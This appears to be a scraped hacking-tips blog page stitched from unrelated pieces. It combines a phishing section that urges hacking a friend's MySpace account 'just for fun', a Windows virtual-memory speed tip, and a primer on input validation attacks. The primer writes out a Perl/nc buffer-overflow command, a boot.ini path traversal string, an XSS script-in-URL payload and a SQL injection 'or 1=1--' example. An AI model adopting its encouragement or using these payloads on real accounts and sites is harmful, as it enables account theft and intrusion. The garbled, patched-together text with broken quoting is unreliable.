http://www.sniperspy.com/

2. HOW TO HACK MYSPACE – Other Ways

Phishing
Phising is the most commonly used method to hack MySpace. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites like Yahoo, Gmail, MySpace etc. The victim is fooled to believe the fake Myspace page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her Myspace login details are stolen away.

Phishing is proved to be the most effective way to hack Myspace and also has high success rate. The reason for this is quite simple. The users are not aware of the phishing attack. Also the users are fooled, since the fake login pages imitate the appearance of the original pages. So, you may use the phishing technique to hack your friend’s MySpace account (just for fun). But you must have a detailed technical knowledge of HTML and server side scripting languages (php, perl etc.) to create a fake login page.

Increase Virtual RAM - To Make Your System Faster 100 percent works

Follow the steps given below :-

1) Hold down the 'Windows' Key and Press the 'Pause/Break' button at the top right of your keyboard.
Another way is Right-Clicking 'My Computer' and then Select 'Properties'.

2) Click on the 'Advanced' tab.

3) Under 'Performance', click 'Settings'.

4) Then click the 'Advanced' tab on the button that pops up.

5) Under 'Virtual Memory' at the bottom, click 'Change'.

6) Click the 'Custom Size' button.

7) For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I use 6000).

8) Click 'Set', and then exit out of all of the windows.

9) Finally, Restart your computer.

10) You now have a faster computer and 1-2GB of Virtual RAM..!

Input Validation Attacks

Input Validation Attacks are where an attacker intentionally sends unusual input in the hopes of confusing the application.The most common input validation attacks are as follows-

1) Buffer Overflow :- Buffer overflow attacks are enabled due to sloppy programming or mismanagement of memory by the application developers. Buffer overflow may be classified into stack overflows, format string overflows, heap overflows and integer overflows. It may possible that an overflow may exist in language’s (php, java, etc.) built-in functions.
To execute a buffer overflow attack, you merely dump as much data as possible into an input field. The attack is said to be successful when it returns an application error. Perl is well suited for conducting this type of attack.
Here’s the buffer test, calling on Perl from the command line:
$ echo –e “GET /login.php?user=\
> `perl –e ‘print “a” x 500’`\nHTTP/1.0\n\n” | \
nc –vv website 80
This sends a string of 500 “a” characters for the user value to the login.php file.
Buffer overflow can be tested by sending repeated requests to the application and recording the server's response.

2) Canonicalization :- These attacks target pages that use template files or otherwise reference alternate files on the web server. The basic form of this attack is to move outside of the web document root in order to access system files, i.e., “../../../../../../../../../boot.ini”. This type of functionality is evident from the URL and is not limited to any one programming language or web server. If the application does not limit the types of files that it is supposed to view, then files outside of the web document root are targeted, something like following-
/menu.asp?dimlDisplayer=menu.asp
/webacc?User.asp=login.htt
/SWEditServlet?station_path=Z&publication_id=2043&template=login.tem
/Getfile.asp?/scripts/Client/login.js
/includes/printable.asp?Link=customers/overview.htm

3) Cross-site Scripting (XSS) :- Cross-site scripting attacks place malicious code, usually javascript, in locations where other users see it. Target fields in forms can be addresses, bulletin board comments, etc.
We have found that error pages are often subject to XSS attacks. For example, the URL for a normal application error looks like this:
http://website/inc/errors.asp?Error=Invalid%20password
This displays a custom access denied page that says, “Invalid password”. Seeing a string
on the URL reflected in the page contents is a great indicator of an XSS vulnerability. The attack would be created as:
http://website/inc/errors.asp?Error=<script%20src=...
That is, place the script tags on the URL.

4) SQL Injection :- This kind of attack occurs when an attacker uses specially crafted SQL queries as an input, which can open up a database. Online forms such as login prompts, search enquiries, guest books, feedback forms, etc. are specially targeted.
The easiest test for the presence of a SQL injection attack is to append “or+1=1” to the URL and inspect the data returned by the server.
example:- http://www.domain.com/index.asp?querystring=sports' or 1=1--